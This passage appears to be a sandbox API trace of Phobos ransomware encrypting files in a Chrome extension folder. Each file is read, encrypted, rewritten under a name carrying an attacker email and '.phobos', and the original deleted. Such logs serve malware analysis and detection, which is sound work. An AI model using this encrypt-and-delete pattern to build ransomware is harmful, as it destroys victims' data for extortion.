returned 1 [0162.357] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0162.357] CryptDestroyKey (hKey=0xa32d28) returned 1 [0162.357] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0162.357] CryptDestroyKey (hKey=0xa327e8) returned 1 [0162.357] CloseHandle (hObject=0x134) returned 1 [0162.357] CloseHandle (hObject=0x17c) returned 1 [0162.357] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html")) returned 1 [0162.358] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0162.358] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0162.358] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=59) returned 1 [0162.358] CloseHandle (hObject=0x17c) returned 1 [0162.359] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html")) returned 0x2020 [0162.359] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0162.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0162.359] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0162.359] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0162.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0162.359] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0162.359] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0162.359] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3b, lpOverlapped=0x0) returned 1 [0162.360] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0162.360] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x40, lpOverlapped=0x0) returned 1 [0162.361] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0162.361] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0162.361] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0162.361] CryptDestroyKey (hKey=0xa32d28) returned 1 [0162.361] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0162.361] CryptDestroyKey (hKey=0xa327e8) returned 1 [0162.361] CloseHandle (hObject=0x17c) returned 1 [0162.361] CloseHandle (hObject=0x134) returned 1 [0162.361] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html")) returned 1 [0162.362] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0162.362] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0162.363] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=59) returned 1 [0162.363] CloseHandle (hObject=0x134) returned 1 [0162.363] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html")) returned 0x2020 [0162.363] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0162.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0162.363] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0162.363] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0162.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0162.363] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0162.363] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0162.363] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3b, lpOverlapped=0x0) returned 1 [0162.364] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0162.364] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x40, lpOverlapped=0x0) returned 1 [0162.365] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0162.365] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0162.365] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0162.365] CryptDestroyKey (hKey=0xa32d28) returned 1 [0162.365] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0162.365] CryptDestroyKey (hKey=0xa327e8) returned 1 [0162.365] CloseHandle (hObject=0x134) returned 1 [0162.365] CloseHandle (hObject=0x17c) returned 1 [0162.365] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html")) returned 1 [0162.366] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0162.366] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0162.367] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=5964) returned 1 [0162.367] CloseHandle (hObject=0x17c) returned 1 [0162.367] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html")) returned 0x2020 [0162.367] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0162.367] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0162.367] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0162.367] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0162.367] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0162.372] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0162.372] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0162.372] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x174c, lpOverlapped=0x0) returned 1 [0162.471] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1750, dwBufLen=0x1750 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1750) returned 1 [0162.471] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1750, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1750, lpOverlapped=0x0) returned 1 [0162.472] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0162.472] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0162.472] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0162.472] CryptDestroyKey (hKey=0xa32da8) returned 1 [0162.472] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0162.472] CryptDestroyKey (hKey=0xa327e8) returned 1 [0162.472] CloseHandle (hObject=0x17c) returned 1 [0162.472] CloseHandle (hObject=0x134) returned 1 [0162.472] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html")) returned 1 [0162.473] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0162.473] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0162.489] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2373) returned 1 [0162.489] CloseHandle (hObject=0x134) returned 1 [0162.489] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js")) returned 0x2020 [0162.489] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0162.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0162.490] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0162.490] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0162.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0162.490] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0162.490] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0162.490] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x945, lpOverlapped=0x0) returned 1 [0162.769] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x950, dwBufLen=0x950 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x950) returned 1 [0162.769] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x950, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x950, lpOverlapped=0x0) returned 1 [0162.770] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0162.770] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0162.770] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x30, dwBufLen=0x30 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x30) returned 1 [0162.770] CryptDestroyKey (hKey=0xa32da8) returned 1 [0162.770] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe2, lpOverlapped=0x0) returned 1 [0162.770] CryptDestroyKey (hKey=0xa32968) returned 1 [0162.770] CloseHandle (hObject=0x134) returned 1 [0162.770] CloseHandle (hObject=0x17c) returned 1 [0162.771] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js")) returned 1 [0162.771] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0162.771] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 